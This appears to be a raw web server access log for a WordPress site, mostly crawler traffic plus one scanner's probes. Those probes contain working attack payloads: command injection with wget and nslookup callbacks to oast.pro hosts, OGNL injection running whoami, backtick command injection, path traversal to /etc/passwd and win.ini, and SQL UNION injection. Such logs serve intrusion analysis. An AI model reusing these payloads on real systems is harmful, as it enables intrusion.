157.20.32.210 - - [18/Oct/2025:10:53:48 -0400] "GET /sap/admin/public/default.html HTTP/1.1" 404 54120 "-" "-"
157.20.32.210 - - [18/Oct/2025:10:54:00 -0400] "GET / HTTP/1.1" 200 4189 "-" "-"
157.20.32.210 - - [18/Oct/2025:10:54:10 -0400] "POST /geoserver/wms HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:10:54:11 -0400] "GET /products60933904?kg=0060190889 HTTP/1.1" 404 9745 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:10:54:17 -0400] "GET /products54861968?kg=0054193001 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:54:38 -0400] "GET /products34975250?kg=0034548804 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:54:32 -0400] "GET /products7184676?kg=0007097139 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:54:39 -0400] "GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d3pm34ikdbcl3g7iqchgckngsdfpbpmqz.oast.pro; HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25"
216.73.216.159 - - [18/Oct/2025:10:54:44 -0400] "GET /products89581934?kg=0088489554 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:54:50 -0400] "GET /products76579062?kg=0075645254 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:54:57 -0400] "GET /products54860296?kg=0054191349 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:54:59 -0400] "POST /actuator/gateway/refresh HTTP/1.1" 404 12307 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
185.61.153.107 - - [18/Oct/2025:10:55:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760799314.6683690547943115234375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:10:55:11 -0400] "DELETE /actuator/gateway/routes/34EYbFgKQV11MV12UZHAyY6hGu0 HTTP/1.1" 404 12302 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.14"
213.32.31.149 - - [18/Oct/2025:10:55:13 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko"
157.20.32.210 - - [18/Oct/2025:10:55:19 -0400] "GET /vcac/?original_uri=https://salhab360photos.com%2Fvcac HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:10:55:46 -0400] "GET /products34967706?kg=0034541352 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:10:56:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760799377.8696849346160888671875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
35.179.127.15 - - [18/Oct/2025:10:57:11 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
216.73.216.159 - - [18/Oct/2025:10:57:38 -0400] "GET /products108228520?kg=0106908741 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:57:47 -0400] "POST /alerts/alertLightbox.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
157.20.32.210 - - [18/Oct/2025:10:57:49 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
216.73.216.159 - - [18/Oct/2025:10:57:45 -0400] "GET /products78153048?kg=0077200045 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:57:52 -0400] "GET /products78116480?kg=0077163921 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
188.166.177.113 - - [18/Oct/2025:10:58:06 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
157.20.32.210 - - [18/Oct/2025:10:54:52 -0400] "POST /actuator/gateway/routes/34EYbFgKQV11MV12UZHAyY6hGu0 HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.3 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:55:07 -0400] "GET /vcac/ HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:10:55:14 -0400] "GET /products60882044?kg=0060139663 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:10:55:52 -0400] "GET /products218198388?kg=0215537515 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:55:59 -0400] "GET /products89578112?kg=0088485777 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:56:06 -0400] "GET /products175168450?kg=0173032332 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:10:56:15 -0400] "GET /products60925626?kg=0060182712 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:10:56:52 -0400] "GET /products206188754?kg=0203674340 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:56:59 -0400] "GET /products107116062?kg=0105809850 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:57:06 -0400] "GET /products239652672?kg=0236730161 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
206.189.247.132 - - [18/Oct/2025:10:57:12 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
146.190.11.185 - - [18/Oct/2025:10:57:14 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
185.61.153.107 - - [18/Oct/2025:10:57:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760799439.0685780048370361328125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:10:57:13 -0400] "GET /products206151202?kg=0203637244 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:10:57:16 -0400] "GET /products60891560?kg=0060149061 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:10:58:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760799496.2704739570617675781250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
188.166.177.113 - - [18/Oct/2025:10:58:13 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
216.73.216.159 - - [18/Oct/2025:10:58:41 -0400] "GET /products121029540?kg=0119553651 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:58:06 -0400] "GET /products120971648?kg=0119496465 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:10:58:19 -0400] "GET /products60938710?kg=0060195638 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:10:58:20 -0400] "GET /products120973666?kg=0119498460 HTTP/1.1" 404 9798 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:58:27 -0400] "GET /products56768072?kg=0056075861 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:58:58 -0400] "POST /alerts/alertConfigField.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:58:54 -0400] "POST /modules/appagebuilder/apajax.php?rand=4328508561166 HTTP/1.1" 404 12307 "https://salhab360photos.com" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:10:59:09 -0400] "GET /products130147370?kg=0128560288 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:00:05 -0400] "GET /products6767874?kg=0006685420 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:00:37 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
157.20.32.210 - - [18/Oct/2025:11:00:34 -0400] "POST /dologin.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:11:00:24 -0400] "GET /products60870928?kg=0060128681 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:00:35 -0400] "GET /products89589314?kg=0088496844 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:00:26 -0400] "GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 404 49076 "-" "-"
157.20.32.210 - - [18/Oct/2025:10:58:43 -0400] "GET /modules/appagebuilder/config.xml HTTP/1.1" 404 12365 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0"
216.73.216.159 - - [18/Oct/2025:10:58:53 -0400] "GET /products56790662?kg=0056098174 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:59:03 -0400] "POST /modules/appagebuilder/apajax.php?rand=1454778254020 HTTP/1.1" 404 12314 "https://salhab360photos.com" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:10:59:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760799554.6750121116638183593750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:10:59:11 -0400] "POST /modules/appagebuilder/apajax.php?rand=9948758904794 HTTP/1.1" 404 12305 "https://salhab360photos.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1"
20.171.207.254 - - [18/Oct/2025:10:59:24 -0400] "GET /products60912634?kg=0060169880 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:00:23 -0400] "POST /dologin.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:11:00:34 -0400] "POST /wp-cron.php?doing_wp_cron=1760799634.0675039291381835937500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:00:37 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
157.20.32.210 - - [18/Oct/2025:11:00:47 -0400] "GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
35.179.127.15 - - [18/Oct/2025:11:01:12 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
196.240.60.216 - - [18/Oct/2025:11:01:13 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
152.42.157.60 - - [18/Oct/2025:11:01:13 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
98.70.29.56 - - [18/Oct/2025:11:01:16 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
66.249.64.107 - - [18/Oct/2025:11:01:31 -0400] "GET /products12271878?kg=0012122302 HTTP/1.1" 200 29171 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:11:01:31 -0400] "GET /products68856958?kg=0068017322 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:01:56 -0400] "GET /34EYbBUpnTEGdXJReVf5PdXOVqS HTTP/1.1" 404 10896 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:02:18 -0400] "POST /admin/uploads.php?id=1 HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
20.171.207.254 - - [18/Oct/2025:11:02:31 -0400] "GET /products60913076?kg=0060170315 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.254 - - [18/Oct/2025:11:03:35 -0400] "GET /products60925918?kg=0060183002 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:03:47 -0400] "GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686; en-US) Gecko/20010604 Firefox/109.0"
157.20.32.210 - - [18/Oct/2025:11:03:49 -0400] "POST /OASREST/v2/authenticate HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:03:56 -0400] "GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:11:04:38 -0400] "GET /products60875816?kg=0060133509 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:04:49 -0400] "GET /products40729450?kg=0040232832 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:11:05:06 -0400] "GET /products15900256?kg=0015706433 HTTP/1.1" 200 28856 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.222.108.119 - - [18/Oct/2025:11:05:42 -0400] "GET /sitemap.xml HTTP/1.1" 200 6044 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.20.32.210 - - [18/Oct/2025:11:00:47 -0400] "POST /dologin.action HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
206.189.247.132 - - [18/Oct/2025:11:01:12 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:11:01:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760799678.0722670555114746093750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:01:27 -0400] "GET /products60918948?kg=0060176115 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:01:53 -0400] "GET /cgi-bin/downloadFlile.cgi?payload=`ls>../34EYbBUpnTEGdXJReVf5PdXOVqS` HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
185.61.153.107 - - [18/Oct/2025:11:02:24 -0400] "POST /wp-cron.php?doing_wp_cron=1760799744.5725259780883789062500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:02:57 -0400] "GET /products148511836?kg=0146700799 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:03:28 -0400] "POST /wp-cron.php?doing_wp_cron=1760799808.5717639923095703125000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:03:25 -0400] "POST /cms/content/list HTTP/1.1" 404 12307 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:03:59 -0400] "GET /products233644162?kg=0230794924 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:04:42 -0400] "POST /wp-cron.php?doing_wp_cron=1760799882.8669600486755371093750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:05:44 -0400] "GET /products167620428?kg=0165576359 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.225.22.28 - - [18/Oct/2025:11:05:50 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
157.20.32.210 - - [18/Oct/2025:11:06:05 -0400] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d3pm34ikdbcl3g7iqchgzybwqwbzofhgb.oast.pro%22%29%7D/ HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.12) Gecko/20100101 Firefox/128.12"
185.61.153.107 - - [18/Oct/2025:11:06:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760799979.4735219478607177734375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:06:16 -0400] "GET /products126467174?kg=0124924974 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:06:41 -0400] "GET /products95171614?kg=0094011066 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:07:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760800036.4726710319519042968750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:07:12 -0400] "GET /34EYbXv4bz8aHi3YR1khXmpUCEs.jsp HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527+ (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
157.20.32.210 - - [18/Oct/2025:11:07:19 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15"
35.179.127.15 - - [18/Oct/2025:11:07:27 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
20.171.207.254 - - [18/Oct/2025:11:07:42 -0400] "GET /products60880690?kg=0060138324 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:11:08:25 -0400] "POST /wp-cron.php?doing_wp_cron=1760800105.4690070152282714843750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:08:36 -0400] "POST /api/agent/tabs/agentData HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
20.171.207.254 - - [18/Oct/2025:11:08:46 -0400] "GET /products60873156?kg=0060130883 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:08:55 -0400] "GET /products130119358?kg=0128532618 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:05:47 -0400] "POST /wp-cron.php?doing_wp_cron=1760799947.8687350749969482421875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:05:40 -0400] "GET /products60918050?kg=0060175228 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:05:42 -0400] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 10892 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
